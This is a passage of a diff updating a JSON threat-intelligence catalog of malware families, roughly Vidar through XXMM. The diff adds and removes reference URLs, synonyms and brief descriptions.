"fb0ad46d-20b6-4e8c-b401-702197667272", + "value": "VHD Ransomware" + }, { "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [], @@ -17762,14 +32148,26 @@ "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vizom", + "https://securityintelligence.com/posts/vizom-malware-targets-brazilian-bank-customers-remote-overlay/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a49d6db9-32a0-42a8-acb9-174146a7fafa", + "value": "Vizom" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/" ], "synonyms": [ "VMzeus", @@ -17787,21 +32185,47 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions" + ], + "synonyms": [ + "Beebone" ], - "synonyms": [], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.void", + "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html" + ], + "synonyms": [ + "VoidCrypt Ransomware" + ], + "type": [] + }, + "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641", + "value": "Void Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", - "https://securelist.com/operation-applejeus/87553/" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", + "https://securelist.com/operation-applejeus/87553/", + "https://securelist.com/lazarus-threatneedle/100803/", + "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view", + "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view" ], "synonyms": [ "FALLCHILL", @@ -17812,6 +32236,20 @@ "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", "value": "Volgmer" }, + { + "description": "Ransomware written in D.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex", + "https://twitter.com/VK_Intel/status/1355196321964109824", + "https://twitter.com/malwrhunterteam/status/1351808079164276736" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fe4ffa8d-74d2-472a-b0ca-83f9e7f95739", + "value": "Vovalex" + }, { "description": "", "meta": { @@ -17853,6 +32291,19 @@ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, + { + "description": "Wabot is an IRC worm that is written in Delphi. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot", + "https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cce35d3d-aea0-4e59-92cf-3289be4a4c21", + "value": "win.wabot" + }, { "description": "", "meta": { @@ -17871,22 +32322,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", + "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", + "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", + "https://www.youtube.com/watch?v=Q90uZS3taG0", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/" ], "synonyms": [ "Wana Decrypt0r", @@ -17898,6 +32361,49 @@ "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren", + "https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44f548e2-9a47-433a-bccf-fff412d2963b", + "value": "WannaRen Ransomware" + }, + { + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", + "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://ioc.hatenablog.com/entry/2020/08/16/132853", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", + "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", + "https://www.bbc.com/news/world-us-canada-53195749", + "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", + "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e72a0bde-ea5b-4450-bc90-b5d2dca697b4", + "value": "WastedLocker" + }, { "description": "", "meta": { @@ -18099,20 +32605,36 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord", + "https://revcode.se/product/webmonitor/", + "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], - "synonyms": [], + "synonyms": [ + "RevCode" + ], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { - "description": "", + "description": "WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example \"gost\". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] @@ -18120,12 +32642,25 @@ "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, + { + "description": "According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain \"working_hours\" with a granularity of one minute.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "20286294-3813-4c17-a165-ef12aae64303", + "value": "WhiteBird" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire" ], "synonyms": [], "type": [] @@ -18133,6 +32668,19 @@ "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog", + "https://github.com/Thibault-69/Keylogger-Windows-----WinLog" + ], + "synonyms": [], + "type": [] + }, + "uuid": "772099d0-b74a-4a73-9967-f1d40ab3ac92", + "value": "winlog" + }, { "description": "", "meta": { @@ -18153,16 +32701,47 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", + "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", + "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", + "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", "https://github.com/TKCERT/winnti-suricata-lua", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-nmap-script", + "http://web.br.de/interaktiv/winnti/english/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", + "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://securelist.com/games-are-over/70991/", - "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + "https://github.com/superkhung/winnti-sniff", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://github.com/br-data/2019-winnti-analyse/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://github.com/TKCERT/winnti-nmap-script", + "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" + ], + "synonyms": [ + "BleDoor", + "JUMPALL", + "Pasteboy", + "RbDoor" ], - "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", @@ -18174,7 +32753,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", - "https://securelist.com/atm-robber-winpot/89611/" + "https://securelist.com/atm-robber-winpot/89611/", + "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [ "ATMPot" @@ -18202,6 +32782,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" ], "synonyms": [], @@ -18244,8 +32826,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu" ], "synonyms": [], "type": [] @@ -18282,6 +32863,48 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole", + "https://content.fireeye.com/apt/rpt-apt38", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1bff74d-873d-41ad-9f76-b341e6fe5cb9", + "value": "WORMHOLE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker", + "https://twitter.com/Kangxiaopao/status/1355056807924797440" + ], + "synonyms": [ + "WormLckr" + ], + "type": [] + }, + "uuid": "4cc30b46-53c0-45c4-8847-e3b228bf8d7b", + "value": "WormLocker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot", + "https://www.zscaler.com/blogs/security-research/malware-leveraging-xml-rpc-vulnerability-exploit-wordpress-sites" + ], + "synonyms": [], + "type": [] + }, + "uuid": "454e0737-98d6-499a-8562-1adf5c081d0d", + "value": "WpBruteBot" + }, { "description": "", "meta": { @@ -18295,18 +32918,37 @@ "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", "value": "WSCSPL" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.x4", + "https://www.gradiant.org/noticia/analysis-malware-cve-2017/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "107341e7-e045-4798-9fab-16691e86bc58", + "value": "x4" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" ], "synonyms": [ "chopstick", @@ -18342,6 +32984,92 @@ "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, + { + "description": "According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", + "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", + "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", + "https://github.com/eset/malware-ioc/tree/master/xdspy/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2cf836f5-b88a-417d-b3c6-ab2580fea6ad", + "value": "XDSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon", + "https://twitter.com/3xp0rtblog/status/1331974232192987142" + ], + "synonyms": [], + "type": [] + }, + "uuid": "09fd85b1-6fc9-45af-a37e-732b5fc6447b", + "value": "Xenon Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm", + "https://twitter.com/VK_Intel/status/1149454961740255232", + "https://twitter.com/r3c0nst/status/1149043362244308992" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e78a2a31-8c20-4493-b854-c708e81b3f41", + "value": "XFSADM" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr", + "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/", + "https://twitter.com/r3c0nst/status/1166773324548063232" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ba99edf0-1603-4f54-8fa9-18852417d0fc", + "value": "XFSCashNCR" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba", + "https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html" + ], + "synonyms": [ + "FlyStudio Ransomware" + ], + "type": [] + }, + "uuid": "e839ae61-616c-4234-8edb-36b48040e5af", + "value": "XiaoBa Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10", + "https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html" + ], + "synonyms": [ + "FakeChrome Ransomware" + ], + "type": [] + }, + "uuid": "6aa7047f-7dfa-4a10-b515-853c3795db69", + "value": "XP10 Ransomware" + }, { "description": "", "meta": { @@ -18361,6 +33089,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], @@ -18372,6 +33101,20 @@ "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat", + "https://labs.k7computing.com/?p=15672", + "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d03cb3af-2a01-4e46-859a-6b61f3ec3c68", + "value": "XpertRAT" + }, { "description": "", "meta": { @@ -18385,6 +33128,22 @@ "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver", + "https://norfolkinfosec.com/filesnfer-tool-c-python/", + "https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf" + ], + "synonyms": [ + "Filesnfer" + ], + "type": [] + }, + "uuid": "b895ec07-19f7-4131-87c0-fc713fff2351", + "value": "XServer" + }, { "description": "", "meta": { @@ -18409,20 +33168,26 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ + "Shunnael", + "X-Tunnel", "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel" + "value": "XTunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", @@ -18438,7 +33203,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -18455,9 +33220,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + "https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors", + "https://www.macnica.net/mpressioncss/feature_05.html/", + 